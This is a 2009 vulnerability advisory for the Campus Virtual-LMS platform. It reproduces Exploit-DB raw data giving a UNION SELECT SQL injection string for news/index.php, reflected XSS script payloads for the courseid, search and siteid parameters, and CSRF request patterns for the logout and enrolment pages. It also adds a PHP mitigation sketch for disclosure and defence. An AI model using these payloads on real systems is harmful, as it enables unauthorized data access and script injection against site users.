Vendor: Campus Virtual-LMS
By: Yasión
CVSS: 4.3 (MEDIUM)
Vulnerability types: SQLi, XSS, CSRF
CWE: 89, 79, 352
Product Name: Campus Virtual-LMS
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
2009

Campus Virtual-LMS

Campus Virtual-LMS is vulnerable to SQL injection, Cross-Site Scripting and Cross-Site Request Forgery. The SQL injection vulnerability is in the news/index.php file and can be exploited by sending a crafted HTTP GET request with a negative value in the 'id' parameter. The Cross-Site Scripting vulnerability is in the enrolments/step1.php and files/shared_list.php files and can be exploited by sending a crafted HTTP GET request containing JavaScript code in the 'courseid' and 'search' parameters respectively. The Cross-Site Request Forgery vulnerability is in the login/logout.php and enrolments/step2.php files and can be exploited by sending a crafted HTTP request with attacker-chosen 'action' and 'orderid' parameters.

Mitigation:

Input validation should be used to prevent SQL injection, Cross-Site Scripting and Cross-Site Request Forgery attacks. The application should also use a secure authentication mechanism and session management.
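
As an added illustration of the mitigation above (not code from Campus Virtual-LMS or from the advisory), the PHP sketch below shows one defence per issue class: integer validation plus a bound parameter for 'id', output encoding for the reflected 'courseid', 'search' and 'siteid' values, and a per-session token for the logout and basket actions. The function names, the `news` table layout and the `csrf` session key are assumptions.

```php
<?php
declare(strict_types=1);
// Added example: hypothetical helpers, not Campus Virtual-LMS code.

// SQLi (news/index.php?id=...): accept only a positive integer, then bind it.
function fetch_news(PDO $db, string $rawId): ?array
{
    $id = filter_var($rawId, FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    if ($id === false) {
        return null; // negative or non-numeric ids never reach the query
    }
    // Table and column names are assumptions for this sketch.
    $stmt = $db->prepare('SELECT id, title, body FROM news WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// XSS (courseid, search, siteid): encode on output, including both quote
// characters, so a value cannot close the attribute it is echoed into.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// CSRF (login/logout.php, enrolments/step2.php): per-session token.
// Assumes session_start() has already been called by the page.
function csrf_token(): string
{
    if (empty($_SESSION['csrf'])) {
        $_SESSION['csrf'] = bin2hex(random_bytes(32));
    }
    return $_SESSION['csrf'];
}

// State-changing requests must be POST and carry the session's token.
function csrf_check(string $method, ?string $submitted): bool
{
    return $method === 'POST'
        && is_string($submitted)
        && isset($_SESSION['csrf'])
        && hash_equals($_SESSION['csrf'], $submitted);
}
```

Forms would embed `csrf_token()` in a hidden field, and the logout and basket handlers would call `csrf_check()` before acting, which also moves those actions off plain GET links.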

Exploit-DB raw data:

+-----------------------------------------------------------------------------+
LMS:   Campus Virtual-LMS
WEB:   http://campusvirtualcomputrade.cae.net

Author: Yasión
Date: 12 Jun 2009
+-----------------------------------------------------------------------------+

 -----------------------------------------------------------------------------+
 [+] SQLi
 -----------------------------------------------------------------------------+
   File: news/index.php [not logged in]
   GET: ?id
   Injection: -1 union select 1,2,3,4,5,6,7
 -----------------------------------------------------------------------------+

 -----------------------------------------------------------------------------+
 [+] XSS
 -----------------------------------------------------------------------------+
   File: enrolments/step1.php [not logged in]
   GET: ?courseid
   Injection: 1"><script>alert(/xD/.source)</script>

   File: files/shared_list.php [logged in]
   GET/POST: ?search
   Injection: "><script>alert(/xD/.source)</script><!--

   File: files/shared_list.php [logged in]
   GET: ?siteid
   Injection: "><script>alert(/xD/.source)</script><!--
 -----------------------------------------------------------------------------+

 -----------------------------------------------------------------------------+
 [+] CSRF
 -----------------------------------------------------------------------------+
   File: login/logout.php
   Info: Logs the user out by means of an image, a redirect, a
   link...

   File: enrolments/step2.php
   GET: ?action=[ACTION]&orderid=[ORDERID]&courseid=[COURSEID]
   Info: Adds or removes [ADD/DELETE] the course identified by COURSEID to the
   basket identified by ORDERID.    The user's basket would need to be known in
   advance. (Not exploitable)
 -----------------------------------------------------------------------------+

+-----------------------------------------------------------------------------+
Gretz: UnderSecurity.net
+-----------------------------------------------------------------------------+

# milw0rm.com [2009-06-12]